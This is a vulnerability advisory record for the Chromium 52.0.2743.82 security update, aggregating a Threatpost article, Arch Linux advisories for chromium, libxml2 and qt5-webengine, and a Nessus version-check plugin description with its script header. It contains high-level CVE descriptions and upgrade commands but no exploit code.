Chromium was updated to 52.0.2743.82 to fix the following security issues
(boo#989901):
- CVE-2016-1706: Sandbox escape in PPAPI
- CVE-2016-1707: URL spoofing on iOS
- CVE-2016-1708: Use-after-free in Extensions
- CVE-2016-1709: Heap-buffer-overflow in sfntly
- CVE-2016-1710: Same-origin bypass in Blink
- CVE-2016-1711: Same-origin bypass in Blink
- CVE-2016-5127: Use-after-free in Blink
- CVE-2016-5128: Same-origin bypass in V8
- CVE-2016-5129: Memory corruption in V8
- CVE-2016-5130: URL spoofing
- CVE-2016-5131: Use-after-free in libxml
- CVE-2016-5132: Limited same-origin bypass in Service Workers
- CVE-2016-5133: Origin confusion in proxy authentication
- CVE-2016-5134: URL leakage via PAC script
- CVE-2016-5135: Content-Security-Policy bypass
- CVE-2016-5136: Use after free in extensions
- CVE-2016-5137: History sniffing with HSTS and CSP
- CVE-2016-1705: Various fixes from internal audits, fuzzing and other initiatives
{"threatpost": [{"lastseen": "2018-10-06T22:55:00", "description": "Google has patched a high-risk vulnerability in its Chrome browser that allows an attacker to escape the Chrome sandbox.\n\nThat vulnerability is one of 48 bugs fixed in version 52 of Chrome [released Wednesday](<http://googlechromereleases.blogspot.com/search/label/Stable%20updates>).\n\nFour dozen of those flaws are rated as high risks and Google paid out more than $22,000 in rewards to researchers who reported vulnerabilities to the company. Payment on an additional 11 bugs found by bug bounty hunters is pending, Google said.\n\nAmong the other serious vulnerabilities is a URL spoofing bug on iOS, a heap-buffer-overflow and four use-after-free vulnerabilities.\n\nThe bugs were found and reported via the Chrome bug bounty program. Longtime bug hunter Pinkie Pie earned $15,000 for a sandbox escape tied to Chrome\u2019s Pepper Plugin API (PPAPI) component of the browser that aims to make plugins more secure and portable.\n\nGoogle\u2019s sandbox technology isolates system processes in an effort to prevent malware from escaping the Chrome browser and infecting the host computer or allowing it to steal information from the PC or execute remote code. This is just the latest out of many out-of-sandbox escape flaws fixed by Google in previous browser updates. It\u2019s also just the latest sandbox escape flaw found by prolific hacker Pinkie Pie who earned $60,000 in 2012 at CanSecWest for finding several bugs including a sandbox escape bug. The following year Pinkie Pie earned another $50,000 at the Mobile Pwn2Own hacking contest for bugs once again tied to the Chrome sandbox escape bug.\n\nHere are the public bugs fixed in Chrome 52:\n\n[$15000][[610600](<https://crbug.com/610600>)] High CVE-2016-1706: Sandbox escape in PPAPI. Credit to Pinkie Pie \n[$3000][[622183](<https://crbug.com/622183>)] High CVE-2016-1707: URL spoofing on iOS. 
Credit to xisigr of Tencent\u2019s Xuanwu Lab \n[$TBD][[613949](<https://crbug.com/613949>)] High CVE-2016-1708: Use-after-free in Extensions. Credit to Adam Varsan \n[$TBD][[614934](<https://crbug.com/614934>)] High CVE-2016-1709: Heap-buffer-overflow in sfntly. Credit to ChenQin of Topsec Security Team \n[$TBD][[616907](<https://crbug.com/616907>)] High CVE-2016-1710: Same-origin bypass in Blink. Credit to Mariusz Mlynski \n[$TBD][[617495](<https://crbug.com/617495>)] High CVE-2016-1711: Same-origin bypass in Blink. Credit to Mariusz Mlynski \n[$TBD][[618237](<https://crbug.com/618237>)] High CVE-2016-5127: Use-after-free in Blink. Credit to cloudfuzzer \n[$TBD][[619166](<https://crbug.com/619166>)] High CVE-2016-5128: Same-origin bypass in V8. Credit to Anonymous \n[$TBD][[620553](<https://crbug.com/620553>)] High CVE-2016-5129: Memory corruption in V8. Credit to Jeonghoon Shin \n[$TBD][[623319](<https://crbug.com/623319>)] High CVE-2016-5130: URL spoofing. Credit to Wadih Matar \n[$TBD][[623378](<https://crbug.com/623378>)] High CVE-2016-5131: Use-after-free in libxml. Credit to Nick Wellnhofer \n[$1000][[607543](<https://crbug.com/607543>)] Medium CVE-2016-5132: Limited same-origin bypass in Service Workers. Credit to Ben Kelly \n[$1000][[613626](<https://crbug.com/613626>)] Medium CVE-2016-5133: Origin confusion in proxy authentication. Credit to Patch Eudor \n[$500][[593759](<https://crbug.com/593759>)] Medium CVE-2016-5134: URL leakage via PAC script. Credit to Paul Stone \n[$500][[605451](<https://crbug.com/605451>)] Medium CVE-2016-5135: Content-Security-Policy bypass. Credit to kingxwy \n[$TBD][[625393](<https://crbug.com/625393>)] Medium CVE-2016-5136: Use after free in extensions. Credit to Rob Wu \n[$TBD][[625945](<https://crbug.com/625945>)] Medium CVE-2016-5137: History sniffing with HSTS and CSP. 
Credit to Xiaoyin Liu\n", "cvss3": {}, "published": "2016-07-21T17:04:50", "type": "threatpost", "title": "Google Fixes 48 Bugs, Sandbox Escape, in Chrome", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-1706", "CVE-2016-1707", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2016-07-28T12:37:30", "id": "THREATPOST:C2E1563DBC065025E810CF457E1A802B", "href": "https://threatpost.com/google-fixes-sandbox-escape-in-chrome-again/119428/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:41", "description": "- CVE-2016-1705 (arbitrary code execution)\n\nVarious fixes from internal audits, fuzzing and other initiatives.\n\n- CVE-2016-1706 (sandbox escape)\n\nSandbox escape in PPAPI. Credit to Pinkie Pie.\n\n- CVE-2016-1708 (arbitrary code execution)\n\nUse-after-free in Extensions. Credit to Adam Varsan.\n\n- CVE-2016-1709 (arbitrary code execution)\n\nHeap-buffer-overflow in sfntly. Credit to ChenQin of Topsec Security Team.\n\n- CVE-2016-1710, CVE-2016-1711 (same-origin policy bypass)\n\nSame-origin bypass in Blink. Credit to Mariusz Mlynski.\n\n- CVE-2016-5127 (arbitrary code execution)\n\nUse-after-free in Blink. Credit to cloudfuzzer.\n\n- CVE-2016-5128 (same-origin policy bypass)\n\nSame-origin bypass in V8.\n\n- CVE-2016-5129 (arbitrary code execution)\n\nMemory corruption in V8. Credit to Jeonghoon Shin.\n\n- CVE-2016-5130 (URL spoofing)\n\nURL spoofing. Credit to Wadih Matar.\n\n- CVE-2016-5131 (arbitrary code execution)\n\nUse-after-free in libxml. Credit to Nick Wellnhofer.\n\n- CVE-2016-5132 (same-origin policy bypass)\n\nLimited same-origin bypass in Service Workers. 
Credit to Ben Kelly.\n\n- CVE-2016-5133 (man-in-the-middle)\n\nOrigin confusion in proxy authentication. Credit to Patch Eudor.\n\n- CVE-2016-5134 (information leakage)\n\nURL leakage via PAC script. Credit to Paul Stone.\n\n- CVE-2016-5135 (content security policy bypass)\n\nContent-Security-Policy bypass. Credit to ShenYeYinJiu of Tencent\nSecurity Response Center, TSRC.\n\n- CVE-2016-5136 (arbitrary code execution)\n\nUse after free in extensions. Credit to Rob Wu.\n\n- CVE-2016-5137 (information leakage)\n\nHistory sniffing with HSTS and CSP. Credit to Xiaoyin Liu.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 6.0}, "published": "2016-07-24T00:00:00", "type": "archlinux", "title": "chromium: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2016-07-24T00:00:00", "id": "ASA-201607-12", "href": 
"https://lists.archlinux.org/pipermail/arch-security/2016-July/000672.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-06-03T14:53:01", "description": "Arch Linux Security Advisory ASA-201611-2\n=========================================\n\nSeverity: Critical\nDate : 2016-11-01\nCVE-ID : CVE-2016-4658 CVE-2016-5131\nPackage : libxml2\nType : arbitrary code execution\nRemote : Yes\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package libxml2 before version 2.9.4+12+ge905f08-1 is vulnerable to\narbitrary code execution.\n\nResolution\n==========\n\nUpgrade to 2.9.4+12+ge905f08-1.\n\n# pacman -Syu \"libxml2>=2.9.4+12+ge905f08-1\"\n\nThe problems have been fixed upstream but no release is available yet.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2016-4658 (arbitrary code execution)\n\nA use-after-free vulnerability via namespace nodes in XPointer ranges\nwas found in libxml2.\n\n- CVE-2016-5131 (arbitrary code execution)\n\nBugs in xmlXPathEvalExpr and xmlXPtrRangeToFunction can lead to a use-\nafter-free and allow control of the instruction pointer.\n\nImpact\n======\n\nA remote attacker is able to use a specially crafted XPath payload to\nexecute arbitrary code.\n\nReferences\n==========\n\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1384424\nhttps://git.gnome.org/browse/libxml2/commit/?id=c1d1f7121194036608bf555f08d3062a36fd344b\nhttps://git.gnome.org/browse/libxml2/commit/?id=9ab01a277d71f54d3143c2cf333c5c2e9aaedd9e\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=623378\nhttps://access.redhat.com/security/cve/CVE-2016-4658\nhttps://access.redhat.com/security/cve/CVE-2016-5131", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-01T00:00:00", "type": "archlinux", "title": "[ASA-201611-2] libxml2: arbitrary code execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4658", "CVE-2016-5131"], "modified": "2016-11-01T00:00:00", "id": "ASA-201611-2", "href": "https://security.archlinux.org/ASA-201611-2", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-03T14:52:57", "description": "Arch Linux Security Advisory ASA-201612-18\n==========================================\n\nSeverity: Critical\nDate : 2016-12-17\nCVE-ID : CVE-2016-5133 CVE-2016-5147 CVE-2016-5153 CVE-2016-5155\nCVE-2016-5161 CVE-2016-5166 CVE-2016-5170 CVE-2016-5171\nCVE-2016-5172 CVE-2016-5181 CVE-2016-5185 CVE-2016-5186\nCVE-2016-5187 CVE-2016-5188 CVE-2016-5192 CVE-2016-5198\nPackage : qt5-webengine\nType : multiple issues\nRemote : Yes\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package qt5-webengine before version 5.7.1-1 is vulnerable to\nmultiple issues including arbitrary code execution, content spoofing,\ncross-site scripting, information disclosure and same-origin policy\nbypass.\n\nResolution\n==========\n\nUpgrade to 5.7.1-1.\n\n# pacman -Syu \"qt5-webengine>=5.7.1-1\"\n\nThe problems have been fixed upstream in version 
5.7.1.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2016-5133 (content spoofing)\n\nGoogle Chrome before 52.0.2743.82 mishandles origin information during\nproxy authentication, which allows man-in-the-middle attackers to spoof\na proxy-authentication login prompt or trigger incorrect credential\nstorage by modifying the client-server data stream.\n\n- CVE-2016-5147 (cross-site scripting)\n\nBlink, as used in Google Chrome, mishandles deferred page loads, which\nallows remote attackers to inject arbitrary web script or HTML via a\ncrafted web site, aka \"Universal XSS (UXSS).\"\n\n- CVE-2016-5153 (arbitrary code execution)\n\nThe Web Animations implementation in Blink improperly relies on list\niteration, which allows remote attackers to cause a denial of service\n(use-after-destruction) or possibly have unspecified other impact via a\ncrafted web site.\n\n- CVE-2016-5155 (content spoofing)\n\nChromium does not properly validate access to the initial document,\nwhich allows remote attackers to spoof the address bar via a crafted\nweb site.\n\n- CVE-2016-5161 (information disclosure)\n\nThe EditingStyle::mergeStyle function in\nWebKit/Source/core/editing/EditingStyle.cpp in Blink mishandles custom\nproperties, which allows remote attackers to cause a denial of service\nor possibly have unspecified other impact via a crafted web site that\nleverages \"type confusion\" in the StylePropertySerializer class.\n\n- CVE-2016-5166 (information disclosure)\n\nThe download implementation in Chromium does not properly restrict\nsaving a file:// URL that is referenced by an http:// URL, which makes\nit easier for user-assisted remote attackers to discover NetNTLM hashes\nand conduct SMB relay attacks via a crafted web page that is accessed\nwith the \"Save page as\" menu choice.\n\n- CVE-2016-5170 (arbitrary code execution)\n\nWebKit/Source/bindings/modules/v8/V8BindingForModules.cpp in Blink does\nnot properly consider getter side effects during 
array key conversion,\nwhich allows remote attackers to cause a denial of service (use-after-\nfree) or possibly have unspecified other impact via crafted Indexed\nDatabase (aka IndexedDB) API calls.\n\n- CVE-2016-5171 (arbitrary code execution)\n\nWebKit/Source/bindings/templates/interface.cpp in Blink does not\nprevent certain constructor calls, which allows remote attackers to\ncause a denial of service (use-after-free) or possibly have unspecified\nother impact via crafted JavaScript code.\n\n- CVE-2016-5172 (information disclosure)\n\nThe parser in Google V8 mishandles scopes, which allows remote\nattackers to obtain sensitive information from arbitrary memory\nlocations via crafted JavaScript code.\n\n- CVE-2016-5181 (cross-site scripting)\n\nAn universal XSS flaw was found in the Blink component of the Chromium\nbrowser.\n\n- CVE-2016-5185 (arbitrary code execution)\n\nAn use after free flaw was found in the Blink component of the Chromium\nbrowser.\n\n- CVE-2016-5186 (information disclosure)\n\nAn out of bounds read flaw was found in the DevTools component of the\nChromium browser.\n\n- CVE-2016-5187 (content spoofing)\n\nAn URL spoofing flaw was found in the Chromium browser.\n\n- CVE-2016-5188 (content spoofing)\n\nAn UI spoofing flaw was found in the Chromium browser.\n\n- CVE-2016-5192 (same-origin policy bypass)\n\nA cross-origin bypass flaw was found in the Blink component of the\nChromium browser.\n\n- CVE-2016-5198 (arbitrary code execution)\n\nAn out of bounds memory access flaw was found in the V8 component of\nthe Chromium browser.\n\nImpact\n======\n\nA remote attacker can access sensitive information, spoof content,\nbypass security measures or execute arbitrary code on the 
affected\nhost.\n\nReferences\n==========\n\nhttps://code.qt.io/cgit/qt/qtwebengine.git/tree/dist/changes-5.7.1?h=5.7\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=613626\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=628942\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=631052\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=630662\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1372216\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=622420\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=616429\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=641101\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=643357\nhttps://chromereleases.googleblog.com/2016/09/stable-channel-update-for-desktop_13.html\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=616386\nhttps://googlechromereleases.blogspot.fr/2016/10/stable-channel-update-for-desktop.html\nhttps://chromereleases.googleblog.com/2016/11/stable-channel-update-for-desktop.html\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=659475\nhttps://access.redhat.com/security/cve/CVE-2016-5133\nhttps://access.redhat.com/security/cve/CVE-2016-5147\nhttps://access.redhat.com/security/cve/CVE-2016-5153\nhttps://access.redhat.com/security/cve/CVE-2016-5155\nhttps://access.redhat.com/security/cve/CVE-2016-5161\nhttps://access.redhat.com/security/cve/CVE-2016-5166\nhttps://access.redhat.com/security/cve/CVE-2016-5170\nhttps://access.redhat.com/security/cve/CVE-2016-5171\nhttps://access.redhat.com/security/cve/CVE-2016-5172\nhttps://access.redhat.com/security/cve/CVE-2016-5181\nhttps://access.redhat.com/security/cve/CVE-2016-5185\nhttps://access.redhat.com/security/cve/CVE-2016-5186\nhttps://access.redhat.com/security/cve/CVE-2016-5187\nhttps://access.redhat.com/security/cve/CVE-2016-5188\nhttps://access.redhat.com/security/cve/CVE-2016-5192\nhttps://access.redhat.com/security/cve/CVE-2016-5198", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-12-17T00:00:00", "type": "archlinux", "title": "[ASA-201612-18] qt5-webengine: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5133", "CVE-2016-5147", "CVE-2016-5153", "CVE-2016-5155", "CVE-2016-5161", "CVE-2016-5166", "CVE-2016-5170", "CVE-2016-5171", "CVE-2016-5172", "CVE-2016-5181", "CVE-2016-5185", "CVE-2016-5186", "CVE-2016-5187", "CVE-2016-5188", "CVE-2016-5192", "CVE-2016-5198"], "modified": "2016-12-17T00:00:00", "id": "ASA-201612-18", "href": "https://security.archlinux.org/ASA-201612-18", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-05-18T14:25:18", "description": "The version of Google Chrome installed on the remote Windows host is prior to 52.0.2743.82. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple unspecified vulnerabilities exist that allow a remote attacker to cause a denial of service condition or possibly have other impact via unknown vectors.\n (CVE-2016-1705)\n\n - A sandbox protection bypass vulnerability exists in PPAPI due to a failure to validate the origin of IPC messages to the plugin broker process. 
An unauthenticated, remote attacker can exploit this to bypass the sandbox. (CVE-2016-1706)\n\n - A use-after-free error exists in Extensions due to a failure to consider object lifetimes during progress observation. An unauthenticated, remote attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code.\n (CVE-2016-1708)\n\n - An array indexing error exists in the ByteArray::Get() function in data/byte_array.cc due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to cause a heap-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.\n (CVE-2016-1709)\n\n - A same-origin bypass vulnerability exists in Blink due to a failure to prevent window creation by a deferred frame. A remote attacker can exploit this to bypass the same-origin policy. (CVE-2016-1710)\n\n - A same-origin bypass vulnerability exists in Blink due to a failure to disable frame navigation during a detach operation on a DocumentLoader object. A remote attacker can exploit this to bypass the same-origin policy.\n (CVE-2016-1711)\n\n - A use-after-free error exists in Blink in the previousLinePosition() function. An unauthenticated, remote attacker can exploit this, via crafted JavaScript code involving an @import at-rule in a Cascading Style Sheets (CSS) token sequence in conjunction with a rel=import attribute of a LINK element, to cause a denial of service condition or the execution of arbitrary code. (CVE-2016-5127)\n\n - A same-origin bypass vulnerability exists in Google V8 due to a failure to prevent API interceptors from modifying a store target without setting a property. A remote attacker can exploit this to bypass the same-origin policy. (CVE-2016-5128)\n\n - A flaw exists in V8 due to improper processing of left-trimmed objects. 
An unauthenticated, remote attacker can exploit this, via crafted JavaScript code, to cause a denial of service condition or the execution of arbitrary code. (CVE-2016-5129)\n\n - A flaw exists that is triggered when handling two forward navigations that compete in different frames. A remote attacker can exploit this to conduct a URL spoofing attack. (CVE-2016-5130)\n\n - A use-after-free error exists in libxml2 in the xmlXPtrRangeToFunction() function. An unauthenticated, remote attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2016-5131)\n\n - A same-origin bypass vulnerability exists in the Service Workers subsystem due to a failure to properly implement the Secure Contexts specification during decisions about whether to control a subframe. A remote attacker can exploit this to bypass the same-origin policy.\n (CVE-2016-5132)\n\n - A flaw exists in the handling of origin information during proxy authentication that allows a man-in-the-middle attacker to spoof a proxy-authentication login prompt or trigger incorrect credential storage by modifying the client-server data stream. (CVE-2016-5133)\n\n - A validation flaw exists in the Proxy Auto-Config (PAC) feature due to a failure to ensure that URL information is restricted to a scheme, host, and port. A remote attacker can exploit this to disclose credentials by operating a server with a PAC script. (CVE-2016-5134)\n\n - A cross-origin bypass vulnerability exists in Blink due to a failure to consider referrer-policy information inside an HTML document during a preload request. A remote attacker can exploit this to bypass the Content Security Policy (CSP) protection mechanism.\n (CVE-2016-5135)\n\n - A use-after-free error exists in Extensions that allows a remote attacker to dereference already freed memory, resulting in the execution of arbitrary code with elevated privileges. 
(CVE-2016-5136)\n\n - An information disclosure vulnerability exists in Blink when handling HTTP vs HTTPs ports in source expressions.\n An unauthenticated, remote attacker can exploit this to determine whether a specific HTTP Strict Transport Security (HSTS) web site has been visited by reading a CSP report. (CVE-2016-5137)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2016-07-29T00:00:00", "type": "nessus", "title": "Google Chrome < 52.0.2743.82 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_52_0_2743_82.NASL", "href": "https://www.tenable.com/plugins/nessus/92628", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92628);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2016-1705\",\n \"CVE-2016-1706\",\n \"CVE-2016-1708\",\n \"CVE-2016-1709\",\n \"CVE-2016-1710\",\n \"CVE-2016-1711\",\n \"CVE-2016-5127\",\n \"CVE-2016-5128\",\n \"CVE-2016-5129\",\n \"CVE-2016-5130\",\n \"CVE-2016-5131\",\n \"CVE-2016-5132\",\n \"CVE-2016-5133\",\n \"CVE-2016-5134\",\n \"CVE-2016-5135\",\n \"CVE-2016-5136\",\n \"CVE-2016-5137\"\n );\n script_bugtraq_id(92053);\n\n script_name(english:\"Google Chrome < 52.0.2743.82 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote 
Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 52.0.2743.82. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Multiple unspecified vulnerabilities exist that allow a\n remote attacker to cause a denial of service condition\n or possibly have other impact via unknown vectors.\n (CVE-2016-1705)\n\n - A sandbox protection bypass vulnerability exists in\n PPAPI due to a failure to validate the origin of IPC\n messages to the plugin broker process. An\n unauthenticated, remote attacker can exploit this to\n bypass the sandbox. (CVE-2016-1706)\n\n - A use-after-free error exists in Extensions due to a\n failure to consider object lifetimes during progress\n observation. An unauthenticated, remote attacker can\n exploit this to dereference already freed memory,\n resulting in the execution of arbitrary code.\n (CVE-2016-1708)\n\n - An array indexing error exists in the ByteArray::Get()\n function in data/byte_array.cc due to improper \n validation of user-supplied input. An unauthenticated,\n remote attacker can exploit this to cause a heap-based\n buffer overflow, resulting in a denial of service\n condition or the execution of arbitrary code.\n (CVE-2016-1709)\n\n - A same-origin bypass vulnerability exists in Blink due\n to a failure to prevent window creation by a deferred\n frame. A remote attacker can exploit this to bypass the\n same-origin policy. (CVE-2016-1710)\n\n - A same-origin bypass vulnerability exists in Blink due\n to a failure to disable frame navigation during a detach\n operation on a DocumentLoader object. A remote attacker\n can exploit this to bypass the same-origin policy.\n (CVE-2016-1711)\n\n - A use-after-free error exists in Blink in the\n previousLinePosition() function. 
An unauthenticated,\n remote attacker can exploit this, via crafted JavaScript\n code involving an @import at-rule in a Cascading Style\n Sheets (CSS) token sequence in conjunction with a\n rel=import attribute of a LINK element, to cause a\n denial of service condition or the execution of\n arbitrary code. (CVE-2016-5127)\n\n - A same-origin bypass vulnerability exists in Google V8\n due to a failure to prevent API interceptors from\n modifying a store target without setting a property. A\n remote attacker can exploit this to bypass the\n same-origin policy. (CVE-2016-5128)\n\n - A flaw exists in V8 due to improper processing of\n left-trimmed objects. An unauthenticated, remote\n attacker can exploit this, via crafted JavaScript code,\n to cause a denial of service condition or the execution\n of arbitrary code. (CVE-2016-5129)\n\n - A flaw exists that is triggered when handling two\n forward navigations that compete in different frames. A\n remote attacker can exploit this to conduct a URL\n spoofing attack. (CVE-2016-5130)\n\n - A use-after-free error exists in libxml2 in the\n xmlXPtrRangeToFunction() function. An unauthenticated,\n remote attacker can exploit this to dereference already\n freed memory, resulting in the execution of arbitrary\n code. (CVE-2016-5131)\n\n - A same-origin bypass vulnerability exists in the Service\n Workers subsystem due to a failure to properly implement\n the Secure Contexts specification during decisions about\n whether to control a subframe. A remote attacker can\n exploit this to bypass the same-origin policy.\n (CVE-2016-5132)\n\n - A flaw exists in the handling of origin information\n during proxy authentication that allows a\n man-in-the-middle attacker to spoof a\n proxy-authentication login prompt or trigger incorrect\n credential storage by modifying the client-server data\n stream. 
(CVE-2016-5133)\n\n - A validation flaw exists in the Proxy Auto-Config (PAC)\n feature due to a failure to ensure that URL information\n is restricted to a scheme, host, and port. A remote\n attacker can exploit this to disclose credentials by\n operating a server with a PAC script. (CVE-2016-5134)\n\n - A cross-origin bypass vulnerability exists in Blink due\n to a failure to consider referrer-policy information\n inside an HTML document during a preload request. A\n remote attacker can exploit this to bypass the Content\n Security Policy (CSP) protection mechanism.\n (CVE-2016-5135)\n\n - A use-after-free error exists in Extensions that allows\n a remote attacker to dereference already freed memory,\n resulting in the execution of arbitrary code with\n elevated privileges. (CVE-2016-5136)\n\n - An information disclosure vulnerability exists in Blink\n when handling HTTP vs HTTPs ports in source expressions.\n An unauthenticated, remote attacker can exploit this to\n determine whether a specific HTTP Strict Transport\n Security (HSTS) web site has been visited by reading a\n CSP report. 
(CVE-2016-5137)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.com/2016/07/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7c7c32d0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 52.0.2743.82 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n 